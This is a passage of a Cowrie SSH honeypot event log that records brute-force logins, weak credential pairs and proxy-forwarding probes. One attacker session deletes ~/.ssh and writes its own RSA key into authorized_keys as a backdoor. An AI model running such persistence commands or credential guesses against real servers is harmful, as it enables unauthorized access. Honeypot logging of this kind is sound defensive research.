hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:13:40.666755Z","src_ip":"212.227.125.160","session":"c6b8648e6e2a"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":43606,"dst_ip":"1.2.3.4","dst_port":22,"session":"5af8784a11b2","protocol":"ssh","message":"New connection: 193.32.162.145:43606 (1.2.3.4:22) [session: 5af8784a11b2]","sensor":"my-vps","timestamp":"2025-08-26T14:13:44.968181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:13:44.969210Z","src_ip":"193.32.162.145","session":"5af8784a11b2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T14:13:44.998969Z","src_ip":"193.32.162.145","session":"5af8784a11b2"}
{"eventid":"cowrie.login.failed","username":"solv","password":"qwerty123","message":"login attempt [solv/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:13:45.090329Z","src_ip":"193.32.162.145","session":"5af8784a11b2"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:13:45.181349Z","src_ip":"212.227.125.160","session":"c6b8648e6e2a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T14:13:45.439390Z","session":"c6b8648e6e2a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:46.122126Z","src_ip":"193.32.162.145","session":"5af8784a11b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:13:46.363064Z","src_ip":"212.227.125.160","session":"c6b8648e6e2a"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:46.621986Z","src_ip":"212.227.125.160","session":"c6b8648e6e2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57088,"dst_ip":"1.2.3.4","dst_port":22,"session":"541723398fd1","protocol":"ssh","message":"New connection: 212.227.235.229:57088 (1.2.3.4:22) [session: 541723398fd1]","sensor":"my-vps","timestamp":"2025-08-26T14:13:49.427133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:13:49.428120Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:13:49.664331Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.login.success","username":"root","password":"Star@2024","message":"login attempt [root/Star@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:13:50.640616Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:13:51.130387Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:13:51.131392Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:13:51.132902Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:51.372138Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:13:51.937851Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:13:51.938619Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:13:52.174349Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:52.175256Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37096,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8be933885d9","protocol":"ssh","message":"New connection: 212.227.235.229:37096 (1.2.3.4:22) [session: c8be933885d9]","sensor":"my-vps","timestamp":"2025-08-26T14:13:52.400758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:13:52.401705Z","src_ip":"212.227.235.229","session":"c8be933885d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:13:52.636017Z","src_ip":"212.227.235.229","session":"c8be933885d9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:13:53.603601Z","src_ip":"212.227.235.229","session":"c8be933885d9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:54.837952Z","src_ip":"212.227.235.229","session":"c8be933885d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37098,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf0db404a9ed","protocol":"ssh","message":"New connection: 212.227.235.229:37098 (1.2.3.4:22) [session: bf0db404a9ed]","sensor":"my-vps","timestamp":"2025-08-26T14:13:55.067780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:13:55.068579Z","src_ip":"212.227.235.229","session":"bf0db404a9ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:13:55.297596Z","src_ip":"212.227.235.229","session":"bf0db404a9ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:13:56.257985Z","src_ip":"212.227.235.229","session":"bf0db404a9ed"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:56.488797Z","src_ip":"212.227.235.229","session":"bf0db404a9ed"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:56.492376Z","src_ip":"212.227.235.229","session":"541723398fd1"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:14:06.211192Z","src_ip":"212.227.235.229","session":"0490177a6abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46336,"dst_ip":"1.2.3.4","dst_port":22,"session":"538ffc5b6e9f","protocol":"ssh","message":"New connection: 212.227.125.160:46336 (1.2.3.4:22) [session: 538ffc5b6e9f]","sensor":"my-vps","timestamp":"2025-08-26T14:14:29.231316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:14:29.240157Z","src_ip":"212.227.125.160","session":"538ffc5b6e9f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:14:30.432262Z","src_ip":"212.227.125.160","session":"538ffc5b6e9f"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-26T14:14:32.310403Z","src_ip":"212.227.125.160","session":"538ffc5b6e9f"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:14:33.594633Z","src_ip":"212.227.125.160","session":"538ffc5b6e9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":53926,"dst_ip":"1.2.3.4","dst_port":22,"session":"04a21e6e1aa8","protocol":"ssh","message":"New connection: 213.209.150.239:53926 (1.2.3.4:22) [session: 04a21e6e1aa8]","sensor":"my-vps","timestamp":"2025-08-26T14:15:03.925662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:15:03.926713Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T14:15:03.983442Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.266244Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15348,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15348","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.323837Z","session":"04a21e6e1aa8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.380539Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":3171,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3171","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.535036Z","session":"04a21e6e1aa8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T14:15:04.591775Z","src_ip":"213.209.150.239","session":"04a21e6e1aa8"}
